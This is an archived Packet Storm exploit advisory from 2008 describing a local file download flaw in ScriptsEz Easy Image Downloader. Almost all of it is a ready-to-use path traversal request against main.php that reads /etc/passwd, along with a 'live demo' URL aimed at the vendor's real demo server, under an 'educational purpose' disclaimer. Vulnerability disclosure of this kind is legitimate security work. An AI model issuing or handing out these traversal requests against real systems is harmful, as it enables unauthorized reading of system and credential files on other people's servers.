scriptsezid-download.txt

2008-10-09T00:00:00
ID PACKETSTORM:70754
Type packetstorm
Reporter JosS
Modified 2008-10-09T00:00:00

Description

                                        
                                            `# ScriptsEz Easy Image Downloader Local File Download Vulnerability  
# url: http://www.scriptsez.net/  
#  
# Author: JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://spanish-hackers.com  
# team: Spanish Hackers Team - [SHT]  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
  
PoC: /main.php?action=download&id=[FILE]  
Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd  
  
live demo:  
http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd  
  
`